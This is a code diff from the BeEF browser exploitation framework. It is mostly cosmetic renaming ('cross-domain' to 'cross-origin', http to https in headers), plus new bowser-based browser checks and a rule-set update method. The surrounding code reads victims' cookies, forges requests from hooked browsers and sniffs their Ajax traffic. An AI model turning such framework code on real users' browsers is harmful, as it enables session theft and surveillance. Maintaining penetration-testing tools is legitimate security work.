-      return false if !nums_only?(str) and !is_valid_float?(str)
+      return false if !nums_only?(str) and !str.match(/\A(0|[1-9][0-9]{0,3})(\.(0|[1-9][0-9]{0,3})){0,3}\z/)
       return false if str.length > 20
 
       true

core/filters/command.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/filters/http.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/filters/page.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/hbmanager.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/loader.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/logger.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/ar-migrations/015_create_http.rb

@@ -4,8 +4,8 @@ class CreateHttp < ActiveRecord::Migration[6.0]
       t.text :hooked_browser_id
       # The http request to perform. In clear text.
       t.text :request
-      # Boolean value as string to say whether cross-domain requests are allowed
-      t.boolean :allow_cross_domain, default: true
+      # Boolean value as string to say whether cross-origin requests are allowed
+      t.boolean :allow_cross_origin, default: true
       # The http response body received. In clear text.
       t.text :response_data
       # The http response code. Useful to handle cases like 404, 500, 302, ...
@@ -26,7 +26,7 @@ class CreateHttp < ActiveRecord::Migration[6.0]
       t.text :domain
       # The port on which perform the request.
       t.text :port
-      # Boolean value to say if the request was cross-domain
+      # Boolean value to say if the request was cross-origin
       t.text :has_ran, default: 'waiting'
       # The path of the request.
       # Example: /secret.html

core/main/ar-migrations/025_create_xssrays_scan.rb

@@ -5,7 +5,7 @@ class CreateXssraysScan < ActiveRecord::Migration[6.0]
       t.datetime :scan_start
       t.datetime :scan_finish
       t.text :domain
-      t.text :cross_domain
+      t.text :cross_origin
       t.integer :clean_timeout
       t.boolean :is_started
       t.boolean :is_finished

core/main/autorun_engine/engine.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/main/autorun_engine/parser.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/main/autorun_engine/rule_loader.rb

@@ -1,6 +1,6 @@
 #
 # Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -105,6 +105,99 @@ module BeEF
           { 'success' => false, 'error' => e.message }
         end
 
+        # Update an ARE rule set.
+        # @param [Hash] ARE rule ID.
+        # @param [Hash] ARE ruleset as JSON
+        # @return [Hash] {"success": Boolean, "rule_id": Integer, "error": String}
+        def update_rule_json(id, data)
+          # Quite similar in implementation to load_rule_json. Might benefit from a refactor.
+          name = data['name'] || ''
+          author = data['author'] || ''
+          browser = data['browser'] || 'ALL'
+          browser_version = data['browser_version'] || 'ALL'
+          os = data['os'] || 'ALL'
+          os_version = data['os_version'] || 'ALL'
+          modules = data['modules']
+          execution_order = data['execution_order']
+          execution_delay = data['execution_delay']
+          chain_mode = data['chain_mode'] || 'sequential'
+
+          begin
+            BeEF::Core::AutorunEngine::Parser.instance.parse(
+              name,
+              author,
+              browser,
+              browser_version,
+              os,
+              os_version,
+              modules,
+              execution_order,
+              execution_delay,
+              chain_mode
+            )
+          rescue => e
+            print_error("[ARE] Error updating ruleset (#{name}): #{e.message}")
+            return { 'success' => false, 'error' => e.message }
+          end
+
+          existing_rule = BeEF::Core::Models::Rule.where(
+            name: name,
+            author: author,
+            browser: browser,
+            browser_version: browser_version,
+            os: os,
+            os_version: os_version,
+            modules: modules.to_json,
+            execution_order: execution_order.to_s,
+            execution_delay: execution_delay.to_s,
+            chain_mode: chain_mode
+          ).first
+
+          unless existing_rule.nil?
+            msg = "Duplicate rule already exists in the database (ID: #{existing_rule.id})"
+            print_info("[ARE] Skipping ruleset (#{name}): #{msg}")
+            return { 'success' => false, 'error' => msg }
+          end
+          old_are_rule = BeEF::Core::Models::Rule.find_by(id: id)
+
+          old_are_rule.update(
+            name: name,
+            author: author,
+            browser: browser,
+            browser_version: browser_version,
+            os: os,
+            os_version: os_version,
+            modules: modules.to_json,
+            execution_order: execution_order.to_s,
+            execution_delay: execution_delay.to_s,
+            chain_mode: chain_mode
+          )
+
+          print_info("[ARE] Ruleset (#{name}) updated successfully.")
+
+          if @debug_on
+            print_more "Target Browser: #{browser} (#{browser_version})"
+            print_more "Target OS: #{os} (#{os_version})"
+            print_more 'Modules to run:'
+            modules.each do |mod|
+              print_more "(*) Name: #{mod['name']}"
+              print_more "(*) Condition: #{mod['condition']}"
+              print_more "(*) Code: #{mod['code']}"
+              print_more '(*) Options:'
+              mod['options'].each do |key, value|
+                print_more "\t#{key}: (#{value})"
+              end
+            end
+            print_more "Exec order: #{execution_order}"
+            print_more "Exec delay: #{exec_delay}"
+          end
+
+          { 'success' => true }
+        rescue TypeError, ArgumentError => e
+          print_error("[ARE] Failed to update ruleset (#{name}): #{e.message}")
+          { 'success' => false, 'error' => e.message }
+        end
+
         # Load an ARE ruleset from file
         # @param [String] JSON ARE ruleset file path
         def load_rule_file(json_rule_path)

core/main/client/are.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/beef.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/browser.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
@@ -944,14 +944,25 @@ beef.browser = {
      */
     isFF99: function () {
         return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/99./) != null;
+    }, 
+
+    /**
+     * Returns true if the browser is any version of Firefox.
+     * @example: beef.browser.isFFbowser()
+    */
+    isFFbowser: function () {
+        const parser = bowser.getParser(navigator.userAgent);
+        const browserName = parser.getBrowserName();
+        return browserName == 'Firefox';
     },
 
     /**
-     * Returns true if FF.
+     * Returns true if the browser is any version of Firefox.
      * @example: beef.browser.isFF()
      */
     isFF: function () {
-        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31() || this.isFF32() || this.isFF33() || this.isFF34() || this.isFF35() || this.isFF36() || this.isFF37() || this.isFF38() || this.isFF39() || this.isFF40() || this.isFF41() || this.isFF42() || this.isFF43() || this.isFF44() || this.isFF45() || this.isFF46() || this.isFF47() || this.isFF48() || this.isFF49() || this.isFF50() || this.isFF51() || this.isFF52() || this.isFF53() || this.isFF54() || this.isFF55() || this.isFF56() || this.isFF57() || this.isFF58()|| this.isFF59() || this.isFF60() || this.isFF61() || this.isFF62() || this.isFF63() || this.isFF64() || this.isFF65() || this.isFF66() || this.isFF67() || this.isFF68() || this.isFF69() || this.isFF70() || this.isFF71() || this.isFF72() || this.isFF73() || this.isFF74() || this.isFF75() || this.isFF76() || this.isFF77() || this.isFF78() || this.isFF79() || this.isFF80() || this.isFF81() || this.isFF82() || this.isFF83() || this.isFF84() || this.isFF85() || this.isFF86() || this.isFF87() || this.isFF88() || this.isFF89() || this.isFF90() || this.isFF91() || this.isFF92() || this.isFF93() || this.isFF94() || this.isFF95() || this.isFF96() || this.isFF97() || this.isFF98() || this.isFF99();
+        var legacyCheck = this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31() || this.isFF32() || this.isFF33() || this.isFF34() || this.isFF35() || this.isFF36() || this.isFF37() || this.isFF38() || this.isFF39() || this.isFF40() || this.isFF41() || this.isFF42() || this.isFF43() || this.isFF44() || this.isFF45() || this.isFF46() || this.isFF47() || this.isFF48() || this.isFF49() || this.isFF50() || this.isFF51() || this.isFF52() || this.isFF53() || this.isFF54() || this.isFF55() || this.isFF56() || this.isFF57() || this.isFF58()|| this.isFF59() || this.isFF60() || this.isFF61() || this.isFF62() || this.isFF63() || this.isFF64() || this.isFF65() || this.isFF66() || this.isFF67() || this.isFF68() || this.isFF69() || this.isFF70() || this.isFF71() || this.isFF72() || this.isFF73() || this.isFF74() || this.isFF75() || this.isFF76() || this.isFF77() || this.isFF78() || this.isFF79() || this.isFF80() || this.isFF81() || this.isFF82() || this.isFF83() || this.isFF84() || this.isFF85() || this.isFF86() || this.isFF87() || this.isFF88() || this.isFF89() || this.isFF90() || this.isFF91() || this.isFF92() || this.isFF93() || this.isFF94() || this.isFF95() || this.isFF96() || this.isFF97() || this.isFF98() || this.isFF99();
+        return legacyCheck || this.isFFbowser();
     },
 
     /**
@@ -2438,12 +2449,23 @@ beef.browser = {
         return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 99) ? true : false);
     },
 
+    /**
+     * Returns true for modern versions of Chrome (above 9).
+     * @example: beef.browser.isCbowser()
+     */
+    isCbowser: function () {
+        const parser = bowser.getParser(navigator.userAgent);
+        const browserName = parser.getBrowserName();
+        return browserName == 'Chrome';
+    },    
+
     /**
      * Returns true if Chrome.
      * @example: beef.browser.isC()
      */
     isC: function () {
-        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS() || this.isC31() || this.isC31iOS() || this.isC32() || this.isC32iOS() || this.isC33() || this.isC33iOS() || this.isC34() || this.isC34iOS() || this.isC35() || this.isC35iOS() || this.isC36() || this.isC36iOS() || this.isC37() || this.isC37iOS() || this.isC38() || this.isC38iOS() || this.isC39() || this.isC39iOS() || this.isC40() || this.isC40iOS() || this.isC41() || this.isC41iOS() || this.isC42() || this.isC42iOS() || this.isC43() || this.isC43iOS() || this.isC44() || this.isC44iOS() || this.isC45() || this.isC45iOS() || this.isC46() || this.isC46iOS() || this.isC47() || this.isC47iOS() || this.isC48() || this.isC48iOS() || this.isC49() || this.isC49iOS() || this.isC50() || this.isC50iOS() || this.isC51() || this.isC51iOS() || this.isC52() || this.isC52iOS() || this.isC53() || this.isC53iOS() || this.isC54() || this.isC54iOS() || this.isC55() || this.isC55iOS() || this.isC56() || this.isC56iOS() || this.isC57() || this.isC57iOS() || this.isC58() || this.isC58iOS() || this.isC59() || this.isC59iOS()|| this.isC60() || this.isC60iOS()|| this.isC61() || this.isC61iOS()|| this.isC62() || this.isC62iOS()|| this.isC63() || this.isC63iOS()|| this.isC64() || this.isC64iOS()|| this.isC65() || this.isC65iOS()|| this.isC66() || this.isC66iOS()|| this.isC67() || this.isC67iOS()|| this.isC68() || this.isC68iOS()|| this.isC69() || this.isC69iOS()|| this.isC70() || this.isC70iOS()|| this.isC71() || this.isC71iOS()|| this.isC72() || this.isC72iOS()|| this.isC73() || this.isC73iOS()|| this.isC74() || this.isC74iOS()|| this.isC75() || this.isC75iOS()|| this.isC76() || this.isC76iOS()|| this.isC77() || this.isC77iOS()|| this.isC78() || this.isC78iOS()|| this.isC79() || this.isC79iOS()|| this.isC80() || this.isC80iOS()|| this.isC81() || this.isC81iOS()|| this.isC82() || this.isC82iOS()|| this.isC83() || this.isC83iOS()|| this.isC84() || this.isC84iOS()|| this.isC85() || this.isC85iOS()|| this.isC86() || this.isC86iOS()|| this.isC87() || this.isC87iOS()|| this.isC88() || this.isC88iOS()|| this.isC89() || this.isC89iOS()|| this.isC90() || this.isC90iOS()|| this.isC91() || this.isC91iOS()|| this.isC92() || this.isC92iOS()|| this.isC93() || this.isC93iOS()|| this.isC94() || this.isC94iOS()|| this.isC95() || this.isC95iOS()|| this.isC96() || this.isC96iOS()|| this.isC97() || this.isC97iOS()|| this.isC98() || this.isC98iOS()|| this.isC99() || this.isC99iOS();
+        var legacyCheck = this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS() || this.isC31() || this.isC31iOS() || this.isC32() || this.isC32iOS() || this.isC33() || this.isC33iOS() || this.isC34() || this.isC34iOS() || this.isC35() || this.isC35iOS() || this.isC36() || this.isC36iOS() || this.isC37() || this.isC37iOS() || this.isC38() || this.isC38iOS() || this.isC39() || this.isC39iOS() || this.isC40() || this.isC40iOS() || this.isC41() || this.isC41iOS() || this.isC42() || this.isC42iOS() || this.isC43() || this.isC43iOS() || this.isC44() || this.isC44iOS() || this.isC45() || this.isC45iOS() || this.isC46() || this.isC46iOS() || this.isC47() || this.isC47iOS() || this.isC48() || this.isC48iOS() || this.isC49() || this.isC49iOS() || this.isC50() || this.isC50iOS() || this.isC51() || this.isC51iOS() || this.isC52() || this.isC52iOS() || this.isC53() || this.isC53iOS() || this.isC54() || this.isC54iOS() || this.isC55() || this.isC55iOS() || this.isC56() || this.isC56iOS() || this.isC57() || this.isC57iOS() || this.isC58() || this.isC58iOS() || this.isC59() || this.isC59iOS()|| this.isC60() || this.isC60iOS()|| this.isC61() || this.isC61iOS()|| this.isC62() || this.isC62iOS()|| this.isC63() || this.isC63iOS()|| this.isC64() || this.isC64iOS()|| this.isC65() || this.isC65iOS()|| this.isC66() || this.isC66iOS()|| this.isC67() || this.isC67iOS()|| this.isC68() || this.isC68iOS()|| this.isC69() || this.isC69iOS()|| this.isC70() || this.isC70iOS()|| this.isC71() || this.isC71iOS()|| this.isC72() || this.isC72iOS()|| this.isC73() || this.isC73iOS()|| this.isC74() || this.isC74iOS()|| this.isC75() || this.isC75iOS()|| this.isC76() || this.isC76iOS()|| this.isC77() || this.isC77iOS()|| this.isC78() || this.isC78iOS()|| this.isC79() || this.isC79iOS()|| this.isC80() || this.isC80iOS()|| this.isC81() || this.isC81iOS()|| this.isC82() || this.isC82iOS()|| this.isC83() || this.isC83iOS()|| this.isC84() || this.isC84iOS()|| this.isC85() || this.isC85iOS()|| this.isC86() || this.isC86iOS()|| this.isC87() || this.isC87iOS()|| this.isC88() || this.isC88iOS()|| this.isC89() || this.isC89iOS()|| this.isC90() || this.isC90iOS()|| this.isC91() || this.isC91iOS()|| this.isC92() || this.isC92iOS()|| this.isC93() || this.isC93iOS()|| this.isC94() || this.isC94iOS()|| this.isC95() || this.isC95iOS()|| this.isC96() || this.isC96iOS()|| this.isC97() || this.isC97iOS()|| this.isC98() || this.isC98iOS()|| this.isC99() || this.isC99iOS();
+        return legacyCheck || this.isCbowser();
     },
 
     /**
@@ -2486,12 +2508,23 @@ beef.browser = {
         return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/12\./) != null));
     },
 
+    /**
+     * Returns true if the browser is any version of Opera.
+     * @example: beef.browser.isObowser()
+    */
+    isObowser: function () {
+        const parser = bowser.getParser(navigator.userAgent);
+        const browserName = parser.getBrowserName();
+        return browserName == 'Opera';
+    },
+
     /**
      * Returns true if Opera.
      * @example: beef.browser.isO()
      */
     isO: function () {
-        return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12();
+        var legacyCheck = this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12();
+        return legacyCheck || this.isObowser();
     },
 
     /**
@@ -4265,9 +4298,6 @@ beef.browser = {
 
         try {
             var cookies = document.cookie;
-            /* Never stop the madness dear C.
-             * var veglol = beef.browser.cookie.veganLol();
-             */
             if (cookies) details['browser.window.cookies'] = cookies;
         } catch (e) {
             beef.debug("Cookies can't be read. The hooked origin is most probably using HttpOnly.");

core/main/client/browser/cookie.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
@@ -72,7 +72,7 @@ beef.browser.cookie = {
 		},
 
 	    /** @memberof beef.browser.cookie */
-		veganLol: function (){
+		cookieValueRandomizer: function (){
 			var to_hell= '';
 			var min = 17;
 			var max = 25;
@@ -100,7 +100,7 @@ beef.browser.cookie = {
 		},
 		/** @memberof beef.browser.cookie */
 		hasSessionCookies: function (name){
-			this.setCookie( name, beef.browser.cookie.veganLol(), '', '/', '', '' );
+			this.setCookie( name, beef.browser.cookie.cookieValueRandomizer(), '', '/', '', '' );
 
 			cookiesEnabled = (this.getCookie(name) == null)? false:true;
 			this.deleteCookie(name, '/', '');
@@ -109,7 +109,7 @@ beef.browser.cookie = {
 		},
 		/** @memberof beef.browser.cookie */
 		hasPersistentCookies: function (name){
-			this.setCookie( name, beef.browser.cookie.veganLol(), 1, '/', '', '' );
+			this.setCookie( name, beef.browser.cookie.cookieValueRandomizer(), 1, '/', '', '' );
 
 			cookiesEnabled = (this.getCookie(name) == null)? false:true;
 			this.deleteCookie(name, '/', '');

core/main/client/browser/popup.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/dom.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/encode/base64.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/encode/json.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/geolocation.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/hardware.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/init.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/lib/evercookie.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
@@ -31,7 +31,7 @@
  *  for example, if someone deletes all but one type of cookie, once
  *  that cookie is re-discovered, all of the other cookie types get reset
  *
- *  !!! SOME OF THESE ARE CROSS-DOMAIN COOKIES, THIS MEANS
+ *  !!! SOME OF THESE ARE CROSS-ORIGIN COOKIES, THIS MEANS
  *  OTHER SITES WILL BE ABLE TO READ SOME OF THESE COOKIES !!!
  *
  * USAGE:
@@ -803,7 +803,7 @@ this.evercookie_cookie = function(name, value)
         else
             return this.getFromStr(name, document.cookie);
     }catch(e){
-        // the hooked domain is using HttpOnly, so we must set the hook ID in a different way.
+        // the hooked origin is using HttpOnly, so we must set the hook ID in a different way.
         // evercookie_userdata and evercookie_window will be used in this case.
     }
 };

core/main/client/logger.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/mitb.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
@@ -38,7 +38,7 @@ beef.mitb = {
                         if (method == "GET") {
                             //GET request -> cross-origin
                             if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
-                                beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
+                                beef.mitb.sniff("GET [Ajax CrossOrigin Request]: " + url);
                                 window.open(url);
                             }else { //GET request -> same-origin
                                 beef.mitb.sniff("GET [Ajax Request]: " + url);

core/main/client/net.js

@@ -1,6 +1,6 @@
 //
 // Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
@@ -74,7 +74,7 @@ beef.net = {
         this.status_text = null;        // success, timeout, error, ...
         this.response_body = null;      // "<html>…." if not a cross-origin request
         this.port_status = null;        // tcp port is open, closed or not http
-        this.was_cross_domain = null;   // true or false
+        this.was_cross_origin = null;   // true or false
         this.was_timedout = null;       // the user specified timeout was reached
         this.duration = null;           // how long it took for the request to complete
         this.headers = null;            // full response headers
@@ -217,11 +217,11 @@ beef.net = {
      * @return {Object} this object contains the response details
      */
     request: function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
-        //check if same domain or cross domain
-        var cross_domain = true;
+        //check if same origin or cross origin
+        var cross_origin = true;
         if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
             if (document.location.port == "" || document.location.port == null) {
-                cross_domain = !(port == "80" || port == "443");
+                cross_origin = !(port == "80" || port == "443");
             }
         }
 
@@ -238,12 +238,12 @@ beef.net = {
 
         //define response object
         var response = new this.response;
-        response.was_cross_domain = cross_domain;
+        response.was_cross_origin = cross_origin;
         var start_time = new Date().getTime();
 
         /*
          * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
-         * This will turn POSTs into GETs for remote-domain requests.
+         * This will turn POSTs into GETs for cross origin requests.
          */
         if (method == "POST") {
             $j.ajaxSetup({
@@ -310,7 +310,7 @@ beef.net = {
     /**
      * Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:
      *  - requestid: needed on the callback
-     *  - allowCrossDomain: set cross-domain requests as allowed or blocked
+     *  - allowCrossOrigin: set cross-origin requests as allowed or blocked
      *
      * forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
      * Example usage:
@@ -318,20 +318,20 @@ beef.net = {
      *   true, null, { foo: "bar" }, 5, 'html', false, null, function(response) {
      *   alert(response.response_body)})
      */
-    forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
+    forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossOrigin, requestid, callback) {
 
         if (domain == "undefined" || path == "undefined") {
             beef.debug("[beef.net.forge_request] Error: Malformed request. No host specified.");
             return;
         }
 
-        // check if same domain or cross domain
-        var cross_domain = true;
+        // check if same origin or cross origin
+        var cross_origin = true;
         if (document.domain == domain && document.location.protocol == scheme + ':') {
             if (document.location.port == "" || document.location.port == null) {
-                cross_domain = !(port == "80" || port == "443");
+                cross_origin = !(port == "80" || port == "443");
             } else {
-                if (document.location.port == port) cross_domain = false;
+                if (document.location.port == port) cross_origin = false;
             }
         }
 
@@ -348,23 +348,23 @@ beef.net = {
 
         // define response object
         var response = new this.response;
-        response.was_cross_domain = cross_domain;
+        response.was_cross_origin = cross_origin;
         var start_time = new Date().getTime();
 
-        // if cross-domain requests are not allowed and the request is cross-domain
+        // if cross-origin requests are not allowed and the request is cross-origin
         // don't proceed and return
-        if (allowCrossDomain == "false" && cross_domain) {
+        if (allowCrossOrigin == "false" && cross_origin) {
             beef.debug("[beef.net.forge_request] Error: Cross Domain Request. The request was not sent.");
             response.status_code = -1;
-            response.status_text = "crossdomain";
-            response.port_status = "crossdomain";
+            response.status_text = "crossorigin";
+            response.port_status = "crossorigin";
             response.response_body = "ERROR: Cross Domain Request. The request was not sent.\n";
             response.headers = "ERROR: Cross Domain Request. The request was not sent.\n";
             if (callback != null) callback(response, requestid);
             return response;
         }
 
-        // if the request was cross-domain from a HTTPS origin to HTTP
+        // if the request was cross-origin from a HTTPS origin to HTTP
         // don't proceed and return
         if (document.location.protocol == 'https:' && scheme == 'http') {
             beef.debug("[beef.net.forge_request] Error: Mixed Active Content. The request was not sent.");
@@ -379,7 +379,7 @@ beef.net = {
 
         /*
          * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
-         * This will turn POSTs into GETs for remote-domain requests.
+         * This will turn POSTs into GETs for cross origin requests.
          */
         if (method == "POST") {
             $j.ajaxSetup({
@@ -432,10 +432,10 @@ beef.net = {
             },
 
             complete: function (xhr, textStatus) {
-                // cross-domain request
-                if (cross_domain) {
+                // cross-origin request
+                if (cross_origin) {
 
-                    response.port_status = "crossdomain";
+                    response.port_status = "crossorigin";
 
                     if (xhr.status != 0) {
                         response.status_code = xhr.status;
@@ -446,7 +446,7 @@ beef.net = {
                     if (textStatus) {
                         response.status_text = textStatus;
                     } else {
-                        response.status_text = "crossdomain";
+                        response.status_text = "crossorigin";
                     }
 
